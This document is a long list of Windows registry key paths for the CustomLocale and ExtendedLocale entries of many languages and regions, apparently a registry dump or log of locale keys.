HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\tr-TR
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ur
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ur
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ur-PK
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ur-PK
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\id
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\id
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\id-ID
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\id-ID
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\uk
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\uk
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\uk-UA
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\uk-UA
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\be
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\be
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\be-BY
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\be-BY
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\sl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\sl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\sl-SI
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\sl-SI
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\et
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\et
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\et-EE
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\et-EE
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\lv
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\lv
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\lv-LV
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\lv-LV
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\lt
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\lt
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\lt-LT
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\lt-LT
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\tg
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\tg
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\tg-Cyrl-TJ
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\tg-Cyrl-TJ
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\fa
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\fa
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\fa-IR
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\fa-IR
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\vi
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\vi
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\vi-VN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\vi-VN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\hy
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\hy
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\hy-AM
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\hy-AM
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\az
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\az
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\az-Latn-AZ
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\az-Latn-AZ
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\eu
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\eu
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\eu-ES
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\eu-ES
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\hsb
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\hsb
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\hsb-DE
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\hsb-DE
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\mk
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\mk
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\mk-MK
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\mk-MK
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\tn
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\tn
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\tn-ZA
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\tn-ZA
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\xh
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\xh
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\xh-ZA
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\xh-ZA
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\zu
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\zu
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\zu-ZA
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\zu-ZA
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\af
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\af
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\af-ZA
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\af-ZA
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ka
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ka
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ka-GE
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ka-GE
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\fo
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\fo
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\fo-FO
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\fo-FO
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\hi
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\hi
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\hi-IN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\hi-IN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\mt
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\mt
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\mt-MT
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\mt-MT
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\se
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\se
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\se-NO
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\se-NO
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ga
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ga
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ga-IE
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ga-IE
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ms
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ms
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ms-MY
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ms-MY
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\kk
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\kk
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\kk-KZ
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\kk-KZ
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ky
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ky
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ky-KG
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ky-KG
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\sw
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\sw
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\sw-KE
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\sw-KE
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\tk
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\tk
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\tk-TM
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\tk-TM
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\uz
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\uz
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\uz-Latn-UZ
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\uz-Latn-UZ
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\tt
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\tt
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\tt-RU
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\tt-RU
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\bn
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\bn
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\bn-IN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\bn-IN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\pa
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\pa
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\pa-IN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\pa-IN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\gu
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\gu
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\gu-IN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\gu-IN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\or
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\or
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\or-IN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\or-IN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ta
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ta
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ta-IN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ta-IN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\te
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\te
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\te-IN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\te-IN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\kn
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\kn
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\kn-IN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\kn-IN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ml
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ml
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ml-IN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ml-IN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\as
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\as
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\as-IN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\as-IN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\mr
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\mr
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\mr-IN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\mr-IN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\sa
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\sa
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\sa-IN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\sa-IN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\mn
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\mn
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\mn-MN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\mn-MN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\bo
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\bo
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\bo-CN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\bo-CN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\cy
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\cy
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\cy-GB
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\cy-GB
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\km
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\km
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\km-KH
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\km-KH
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\lo
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\lo
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\lo-LA
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\lo-LA
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\gl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\gl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\gl-ES
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\gl-ES
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\kok
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\kok
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\kok-IN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\kok-IN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\syr
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\syr
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\syr-SY
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\syr-SY
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\si
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\si
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\si-LK
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\si-LK
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\iu
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\iu
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\iu-Latn-CA
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\iu-Latn-CA
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\am
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\am
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\am-ET
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\am-ET
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\tzm
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\tzm
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\tzm-Latn-DZ
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\tzm-Latn-DZ
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ne
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ne
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ne-NP
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ne-NP
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\fy
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\fy
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\fy-NL
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\fy-NL
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ps
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ps
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ps-AF
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ps-AF
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\fil
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\fil
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\fil-PH
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\fil-PH
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\dv
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\dv
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\dv-MV
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\dv-MV
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ha
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ha
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ha-Latn-NG
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ha-Latn-NG
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\yo
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\yo
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\yo-NG
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\yo-NG
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\quz
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\quz
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\quz-BO
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\quz-BO
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\nso
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\nso
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\nso-ZA
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\nso-ZA
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ba
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ba
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ba-RU
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ba-RU
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\lb
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\lb
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\lb-LU
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\lb-LU
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\kl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\kl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\kl-GL
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\kl-GL
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ig
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ig
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ig-NG
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ig-NG
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ii
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ii
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ii-CN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ii-CN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\arn
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\arn
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\arn-CL
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\arn-CL
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\moh
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\moh
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\moh-CA
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\moh-CA
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\br
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\br
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\br-FR
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\br-FR
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ug
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ug
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ug-CN
